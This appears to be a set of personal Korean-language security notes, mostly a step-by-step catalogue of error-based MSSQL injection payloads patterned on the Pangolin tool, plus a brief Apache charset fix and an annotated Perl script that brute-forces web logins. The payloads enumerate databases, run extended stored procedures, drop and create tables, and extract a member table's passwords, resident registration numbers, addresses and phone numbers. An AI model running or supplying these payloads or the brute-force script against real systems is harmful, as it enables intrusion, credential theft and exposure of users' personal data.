Pangolin(MSSQL)

-Information
--Version : ' and @@version=1--
--Db Name : ' and db_name()=0--
--Server Name : ' and @@servername=0--
--Host Name : ' and host_name()=0--
--System User : ' and system_user=0--
--Current User : ' and user=0--
--Privilege : ' and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar(1))+char(124)=1--
--Databases :
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  1 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  2 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
.
.
.
동일한 응답이 나오면 중단

--Drivers :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),low%20nvarchar(255),high%20nvarchar(255),type%20nvarchar(255));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_availablemedia;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20;drop%20table%20pangolin_test_table;--

--LocalGroups :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),description%20nvarchar(4000));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_enumgroups;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
>
' ;drop table pangolin_test_table;--
' ;create table pangolin_test_table(name nvarchar(255),description nvarchar(4000));--
' ;insert pangolin_test_table exec master.dbo.xp_enumgroups;--
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  1 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  2 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  3 [name],[description] from pangolin_test_table group by


-Data
--Tables(조회)
' and (select cast(count(1) as varchar(10))+char(94) from [sysobjects] where xtype=char(85) and status!=0)=0--
sysobjects의 레코드 중 xtype이 U인 개수 (사용자 테이블 개수)

' and (select top 1 cast(name as varchar(256)) from(select top 1 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 3 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
테이블명 추출

--Columns
' and (select top 1 cast(id as nvarchar(20))+char(124)  from [sysobjects] where name=0x6d0065006d00620065007200)=0--
테이블명을 헥사로 변경(우회)하여 id값을 추출 (from sysobjects)

' and (select cast(count(1) as varchar(10))+char(94) from [syscolumns] where id=549576996)=0--
id값을 가진 모든 column 개수 추출 (from syscolumns)

' and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
각 column의 이름 추출 (from syscolumns)
.
.
.
' and (select top 1 cast(name as varchar(8000)) from (select top 2 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
계속 추출

--Datas
' and (select cast(count(1) as varchar(8000))+char(94) from [member] where 1=1)=0--
해당 테이블(member)의 레코드 수 추출

' and (select top 1
isnull(cast([mem_id] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_pwd] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_name] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_jumin] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_zip] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr1] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr2] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_tel] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_hp] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_email] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_wtday] as nvarchar(4000)),char(32))
from [member] where 1=1 order by [mem_id])=0--
각 레코드의 필드값 알아내기

이어서..

Apache DefaultCharset

웹 개발자는 자신이 원하는 형태로 Charset을 정하기를 원하는데 웹서버의 기본 Charset으로 인해 문제가 발생할 수 있다.

브라우저에서 아래의 태그를 읽어들이더라도 웹서버의 Charset이 euc-kr로 되어있다면 euc-kr로 해석하게 된다.
<META HTTP-EQUIV=CONTENT-TYPE CONTENT=text/html charset=UTF-7>


해결방법
httpd.conf 또는 apache2.conf 파일의 AddDefaultCharset을 Off로 설정한다. 이 경우 웹서버가 응답에 Charset을 강제로 지정하지 않으므로, 각 페이지가 Content-Type 헤더나 META 태그로 Charset을 명시해야 한다.

AddDefaultCharset Off

# Web login dictionary-attack script as posted. Reads one candidate per line
# from a word list and submits it as BOTH the id and the password in a single
# GET request per line.
# Defender's view: every attempt appears in the web server access log as a GET
# whose query string carries the credential pair, one request per dictionary
# entry from one client. Per-account lockout / rate limiting stops the pattern,
# and keeping credentials out of GET query strings keeps them out of logs.
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
require HTTP::Request;
require HTTP::Response;
# Exactly two arguments are required: the URL template and the dictionary path.
if( $#ARGV != 1 )
  { die "Usage: webbf.pl \"192.168.1.150/login.asp?id=TEST&pw=TEST\" [DICfilename]\n";}

# Split the template on the literal "=TEST" markers:
#   $1 = host + path up to and including '?', $2 = id parameter name,
#   $3 = password parameter name. The match result is not checked, so the
#   three variables are unset if the template deviates from the expected form.
$ARGV[0] =~ /([\w.\/]{1,30}\/\w{1,20}\.\w{1,4}\?)([\w=&]{1,100})=TEST&(\w{1,10})=TEST/;
$URL = $1;
$IDparam = $2;
$PWparam = $3;

$DicfileName = $ARGV[1];
# NOTE: the error text interpolates $fileName, which is never assigned here;
# the path actually opened is $DicfileName, so a failed open reports a blank name.
open( fileHandle, $DicfileName ) || die "Cannot open $fileName.\n";

$attnum=1;   # attempt counter, printed before each request


while($aLine =<fileHandle>)
{
    # Remove a CR and an LF from the line end.
    $aLine =~s/\r//;
    $aLine =~s/\n//;
    
    # The same dictionary entry is used for both fields (id == password).
    $ID = $aLine;
    $PW = $aLine;

  # Plain http:// GET; the credentials travel in the query string.
  $bruteforce = 'http://'.$URL.$IDparam.'='.$ID.'&'.$PWparam.'='.$PW;
  $req = HTTP::Request->new(GET => $bruteforce);
  $res = $ua->request($req);
  print $attnum++.'.--->'.$bruteforce."\n";

  # Success heuristic: the response body does NOT contain the Korean fragment
  # "아이디가" (the start of the site's "ID ..." failure message). Any response
  # lacking that text — including an error or block page — is reported as
  # success, after which the script prints the body and exits.
  if($res->content !~/아이디가/)
 {
    print "bruteforce success\n\n\n\n";
    print $res->content;
    die "\n";
  }
}


웹 애플리케이션 로그인 dictionary attack 공격
한번 요청시마다 일일이 다시 세션을 맺는데 이건 보완해야겠다.
